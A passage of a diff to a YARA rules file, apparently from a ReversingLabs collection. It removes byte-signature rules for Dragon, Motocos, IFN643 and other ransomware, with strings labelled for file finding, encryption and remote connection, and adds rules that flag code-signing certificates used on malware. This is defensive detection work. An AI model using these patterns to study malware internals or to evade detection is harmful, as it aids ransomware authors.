-            00 28 ?? ?? ?? ?? 0A 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 18 73 ?? ?? ?? ?? 0B 73 ?? ?? ??
-            ?? 0C 28 ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 0D 73 ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 00 11 ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 11 ?? 18 6F ?? ?? ?? ?? 00 09 06
-            20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 00 11 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ??
-            ?? 00 11 ?? 1A 6F ?? ?? ?? ?? 00 07 06 16 06 8E 69 6F ?? ?? ?? ?? 00 07 11 ?? 6F ?? ??
-            ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 02 19 73 ?? ?? ?? ?? 13 ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ??
-            13 ?? 00 2B ?? 00 11 ?? 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 11 ?? 16 11 ?? 8E 69
-            6F ?? ?? ?? ?? 25 13 ?? 16 FE 02 13 ?? 11 ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 13
-            ?? 00 72 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE ?? DE
-            ?? 00 11 ?? 6F ?? ?? ?? ?? 00 07 6F ?? ?? ?? ?? 00 00 DC 2A
-        }
-		$find_files = {
-            00 00 02 28 ?? ?? ?? ?? 0A 00 06 0C 16 0D 2B ?? 08 09 9A 13 ?? 00 11 ?? 28 ?? ?? ?? ??
-            00 00 09 17 58 0D 09 08 8E 69 32 ?? 02 28 ?? ?? ?? ?? 0B 00 07 13 ?? 16 13 ?? 2B ?? 11
-            ?? 11 ?? 9A 13 ?? 00 11 ?? 28 ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32
-            ?? 00 DE ?? 26 00 00 DE ?? 2A
-        }
-		$generate_salt = {
-            00 1F ?? 8D ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 00 16 0C 2B ?? 00 07 06 6F ?? ?? ?? ?? 00
-            00 08 17 58 0C 08 1F ?? FE 04 0D 09 2D ?? 00 DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? 00 DC 06
-            13 ?? 2B ?? 11 ?? 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $setup_env ) and ( $find_files ) and ( $generate_salt ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures [ i ] . serial == "25:be:f2:84:67:e4:75:03:31:d2:f4:03:45:81:13:b8" and 1474156800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Dragon : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_0296Cf3314F434C5B74D0C3E36616Dd1 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Dragon ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "dbeab955-f1fe-57eb-a9a4-c8c885ab7fad"
-		date = "2020-10-30"
-		modified = "2020-10-30"
+		id = "ae7d8c3c-0ac8-5ea5-8013-97ccb2ace4e4"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Dragon.yara#L1-L149"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7298c5681deaf04abb6a656cefc09b5ee4096ff7a5028caab1d7b107e97be90a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13584-L13600"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "acf3b7460c79fa71c1b131b26a40bbc286c9da0a5fe7071bbe8b386a3ca91de4"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Dragon"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$remote_connection_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 56 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            85 C0 0F 85 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 88 45 ?? 83 EC ?? 89 45 ?? 8B
-            CC 89 A5 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC E8 ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? BA ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 83 C4 ?? 56 8B D0 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? C6
-            45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ??
-            ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ??
-            ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ??
-            ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1
-        }
-		$remote_connection_p2 = {
-            81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ??
-            52 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? C6 85 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ??
-            ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F
-            87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 8D 4D ?? 8D 55 ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? 0F 43 4D ?? 51 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 83 FA
-            ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ??
-            83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B
-            49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ??
-            64 89 0D ?? ?? ?? ?? 59 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$find_files_1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 83 EC ?? 89 8D ??
-            ?? ?? ?? 8B D4 8D 71 ?? C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C6 02 ?? 8A 01 41
-            84 C0 75 ?? 2B CE 8B B5 ?? ?? ?? ?? 51 56 8B CA E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8D
-            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85
-            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 8B 1D
-        }
-		$find_files_2 = {
-            8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ??
-            33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            8A 11 3A 10 75 ?? 84 D2 74 ?? 8A 51 ?? 3A 50 ?? 75 ?? 83 C1 ?? 83 C0 ?? 84 D2 75 ??
-            33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ??
-            ?? 56 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 51 8B D4 8D 8D ?? ?? ?? ??
-            8D 71 ?? C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? C6 02 ?? 8A 01 41 84 C0 75 ?? 2B
-            CE 8D 85 ?? ?? ?? ?? 51 50 8B CA E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 74 ??
-            83 EC ?? 8B CC 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 50 57 FF D3 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B 4D ?? 5F
-            5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$skip_hk_china_taiwan_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ??
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85
-            C0 0F 85 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 88 45 ?? 89 45 ?? 8D 4D ?? 6A ??
-            68 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 88 45 ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D
-            4D ?? 83 7D ?? ?? 8D 55 ?? 0F 43 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ??
-            68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ??
-            C6 45 ?? ?? 8D 4D ?? 6A ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
-            C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 83 F8
-            ?? 0F 85 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ??
-            ?? ?? 6A ?? 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 55 ??
-            83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83
-            C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72
-            ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8
-            ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 8D ??
-            ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8
-        }
-		$skip_hk_china_taiwan_p2 = {
-            0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42
-            8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ??
-            ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83
-            C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? B0 ??
-            8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 8B 55 ??
-            83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83
-            C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72
-            ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8
-            ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 8D ??
-            ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ??
-            0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42
-            8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51
-            E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ??
-            ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1
-            83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 32 C0 E9 ?? ?? ?? ?? 6A ?? E8
-            ?? ?? ?? ?? E8
-        }
-		$crypt_files = {
-            8B FF 55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 8B 45 ?? 89 45 ?? 89
-            4D ?? 56 8B 75 ?? 85 C9 75 ?? 33 C0 E9 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ?? ?? ?? 83 20
-            ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C8 ?? E9 ?? ?? ?? ?? 53 8B C6
-            8B D6 C1 FA ?? 83 E0 ?? 57 6B F8 ?? 89 55 ?? 8B 14 95 ?? ?? ?? ?? 89 7D ?? 8A 5C 3A
-            ?? 80 FB ?? 74 ?? 80 FB ?? 75 ?? 8B C1 F7 D0 A8 ?? 75 ?? E8 ?? ?? ?? ?? 83 20 ?? E8
-            ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? F6 44 3A ?? ?? 74 ?? 6A
-            ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 8D 7D ?? AB 56 AB AB E8 ?? ?? ?? ??
-            59 84 C0 74 ?? 84 DB 74 ?? FE CB 80 FB ?? 8B 5D ?? 0F 87 ?? ?? ?? ?? FF 75 ?? 8D 45
-            ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 E9 ?? ?? ?? ?? FF 75 ?? 8B 5D ?? 8D 45 ?? 53
-            56 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8B 4D ?? 8B 55 ?? 8B 04 8D ?? ?? ?? ?? 80 7C 10
-            ?? ?? 7D ?? 0F BE C3 8B 5D ?? 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 83 E8 ?? 75 ?? FF 75 ??
-            8D 45 ?? 53 56 50 E8 ?? ?? ?? ?? EB ?? FF 75 ?? 8D 45 ?? 53 56 50 E8 ?? ?? ?? ?? EB
-            ?? FF 75 ?? 8D 45 ?? 53 56 50 E8 ?? ?? ?? ?? EB ?? 8B 4C 10 ?? 8D 7D ?? 8B 5D ?? 33
-            C0 AB 6A ?? AB AB 8D 45 ?? 50 FF 75 ?? 53 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ??
-            ?? ?? ?? 89 45 ?? 8D 75 ?? 8D 7D ?? A5 A5 A5 8B 4D ?? 8B 55 ?? 8B 45 ?? 85 C0 75 ??
-            8B 45 ?? 85 C0 74 ?? 6A ?? 5E 3B C6 75 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 89 30 EB ?? 50 E8 ?? ?? ?? ?? 59 EB ?? 8B 04 8D ?? ?? ?? ?? F6 44 10 ?? ?? 74
-            ?? 80 3B ?? 75 ?? 33 C0 EB ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 20
-            ?? 83 C8 ?? EB ?? 2B 45 ?? 5F 5B 8B 4D ?? 33 CD 5E E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $skip_hk_china_taiwan_p* ) ) and ( all of ( $find_files_* ) ) and ( $crypt_files ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "02:96:cf:33:14:f4:34:c5:b7:4d:0c:3e:36:61:6d:d1" and 1474934400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Motocos : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_045D57D63E13775C8F812E1864797F5A : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Motocos ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "cda44b86-c747-5b48-acd8-e68311ab24a3"
-		date = "2021-09-17"
-		modified = "2021-09-17"
+		id = "c2c37ddc-51bc-58da-b770-df97aebca01d"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Motocos.yara#L1-L75"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "34b99847f029a291808f08ba6e6ae62a54e6fed5acc928fe4828054801786881"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13602-L13618"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d3e61e9a43f5b17ebb08b71dc39648d1f20273a18214f39605f365f9f0f72c10"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Motocos"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$generate_key = {
-            55 8B EC 83 C4 ?? 53 89 4D ?? 89 55 ?? 8B D8 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ??
-            ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 83 7D ?? ?? 74 ?? 8B 45 ?? 8B 15
-            ?? ?? ?? ?? 8B 12 E8 ?? ?? ?? ?? 75 ?? B9 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 89 45 ?? 33 D2 55 68 ?? ??
-            ?? ?? 64 FF 32 64 89 22 8B 4D ?? 8B 55 ?? 8B C3 E8 ?? ?? ?? ?? 89 45 ?? 33 D2 55 68
-            ?? ?? ?? ?? 64 FF 32 64 89 22 8B 45 ?? 85 C0 74 ?? 83 E8 ?? 8B 00 8B D8 89 5D ?? 80
-            7D ?? ?? 75 ?? 8B 5D ?? 03 DB 53 8D 45 ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 C4 ?? 53 8D 45 ?? 50 8B 45 ?? 50 6A ?? 80 7D ?? ?? F5 1B C0 50 6A ?? 8B 45
-            ?? 50 E8 ?? ?? ?? ?? 83 F8 ?? 1B C0 40 84 C0 75 ?? B9 ?? ?? ?? ?? B2 ?? A1 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 50 8D 45 ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 8B 55 ?? 8B 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0
-            5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ??
-            33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? C3 E9 ?? ??
-            ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ??
-            8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5B 8B E5 5D C2
-        }
-		$encrypt_files = {
-            55 8B EC 83 C4 ?? 53 56 57 33 C9 89 4D ?? 89 4D ?? 89 55 ?? 8B 45 ?? E8 ?? ?? ?? ??
-            33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 C6 45 ?? ?? 33 D2 55 68 ?? ?? ?? ?? 64 FF
-            32 64 89 22 B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B D8 8B C3 8B D8 F6 C3 ?? 74 ?? 66 83 E3 ?? B2 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B C3
-            E8 ?? ?? ?? ?? 8B D0 B1 ?? 8B 45 ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8B 4D ?? B2 ?? A1 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 D2
-            55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 8B 45 ?? 8B 10 FF 12 8B C8 8B 55 ?? A1 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B C8 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 88 45 ?? 33 C0 5A 59 59 64
-            89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ??
-            ?? EB ?? 80 7D ?? ?? 75 ?? 8D 45 ?? 50 8B 45 ?? 89 45 ?? C6 45 ?? ?? B8 ?? ?? ?? ??
-            89 45 ?? C6 45 ?? ?? 8D 55 ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ??
-            E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 F8 ?? 1B C0 40 88 45
-            ?? 33 C0 5A 59 59 64 89 10 E9 ?? ?? ?? ?? E9
-        }
-		$find_files = {
-            55 8B EC 83 C4 ?? 53 56 57 33 C9 89 4D ?? 8B FA 89 45 ?? 33 C0 55 68 ?? ?? ?? ?? 64
-            FF 30 64 89 20 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 85 DB 7C ?? 8B 45 ?? 66
-            83 3C 58 ?? 75 ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ?? E8 ?? ?? ?? ??
-            8B 75 ?? 85 F6 74 ?? 83 EE ?? 8B 36 8D 45 ?? 50 8D 53 ?? 8B CE 8B 45 ?? E8 ?? ?? ??
-            ?? 8B C7 8B 55 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8
-            ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8B C7 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68
-            ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 59 59 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $generate_key ) and ( $find_files ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Mei" and pe.signatures [ i ] . serial == "04:5d:57:d6:3e:13:77:5c:8f:81:2e:18:64:79:7f:5a" and 1485043200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_IFN643 : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_6D633Df9Bb6015Fc3Ecea99Dff309Ee7 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects IFN643 ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a4d211a7-6735-541e-885d-555bbc11e2cf"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "b85bf9c5-f438-5973-83ab-926e44cf2298"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.IFN643.yara#L1-L90"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
